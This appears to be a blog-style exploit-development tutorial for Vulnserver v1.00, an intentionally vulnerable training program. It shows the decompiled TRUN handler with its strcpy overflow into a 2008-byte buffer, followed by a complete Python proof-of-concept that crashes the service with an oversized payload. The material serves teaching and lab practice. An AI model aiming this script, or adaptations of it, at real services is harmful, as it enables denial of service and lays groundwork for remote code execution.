Vulnserver v1.00 DoS Exploit Dev#

YouTube#

Vulnerability#

Vulnserver v1.00 has the following commands:

HELP
STATS [stat_value]
RTIME [rtime_value]
LTIME [ltime_value]
SRUN [srun_value]
TRUN [trun_value]
GMON [gmon_value]
GDOG [gdog_value]
KSTET [kstet_value]
GTER [gter_value]
HTER [hter_value]
LTER [lter_value]
KSTAN [lstan_value]
EXIT

The code that controls TRUN is as follows:

1
else if ( !strncmp(buf, "TRUN ", 5u) )
2
{
3
  Destination = (char *)malloc(3000u);
4
  memset(Destination, 0, 3000u);
5
  for ( i = 5; i < len; ++1 )
6
  {
7
    if ( buf[i] == 46 )
8
    {
9
      strncpy(Destination, buf, 3000u);
10
      Function3(Destination);
11
      break;
12
    }
13
  }
14
  memset(Destination, 0, 0xBB8u);
15
  v17 = send(s, "TRUN COMPELTE\n", 14, 0);
16
}
17

18
char *__cdecl Function3(char *Source)
19
{
20
  char Destination[2008];
21

22
  return strcpy(Destination, Source);
23
}

Here, if the 6th value of the string following the TRUN command matches 46 (ASCII text (46): .), Function3 is called from essfunc.dll. This function creates a buffer that can store a string of 2008 bytes but then saves 3000 bytes into it. This is a very dangerous vulnerability that can allow a Buffer OverFlow (BOF) attack.

PoC#

1
from argparse import ArgumentParser
2
from socket import *
3

4
def createPayload():
5
    data = b"A" * 65535
6

7
    payload = b"TRUN \x2E"
8
    payload += data
9

10
    return payload
11

12
def exploit(ip: str, port: int):
13
    print("[~] Generating payload...")
14
    payload = createPayload()
15
    print("[+] Payload generated")
16

17
    s = socket(AF_INET, SOCK_STREAM)
18
    print(f"[~] Connecting to the target: [{ip}]:{port}")
19
    s.connect((ip, port))
20

21
    print("[~] Waiting for a connection message...")
22
    conn_msg = s.recv(65535)
23
    print(f"[+] A connection message received: {conn_msg.decode()}")
24

25
    print("[~] Sending the payload...")
26
    s.send(payload)
27
    s.close()
28
    print("[+] Connection closed")
29

30
    print("[+] DoS Exploit Completed")
31

32
def main():
33
    parser = ArgumentParser(
34
        prog="Vulnserver v1.00 Exploit",
35
        description="TRUN command BOF DoS Vulnerability"
36
    )
37
    parser.add_argument(
38
        "-t", "--target",
39
        type=str,
40
        help="Set target IPv4 address",
41
        required=True
42
    )
43
    parser.add_argument(
44
        "-p", "--port",
45
        type=int,
46
        help="Set target port number",
47
        required=True
48
    )
49

50
    args = parser.parse_args()
51

52
    target_ip       = str(args.target)
53
    target_port     = int(args.port)
54

55
    exploit(target_ip, target_port)
56

57
if __name__ == "__main__":
58
    main()

The Proof of Concept (PoC) above is code that overwrites 65,535 bytes of memory via a Buffer Overflow (BOF) attack. The program terminates abnormally with a DEP Violation error. A DEP Violation error means that an error is returned due to an attempted return to a non-executable memory location. This indicates that it’s possible to overwrite the return address in the program to perform a Control Flow Hijack, which could ultimately lead to the execution of a remote attacker’s shellcode. In Part 2, we will develop an RCE Exploit involving a NOP Slide and shellcode generation.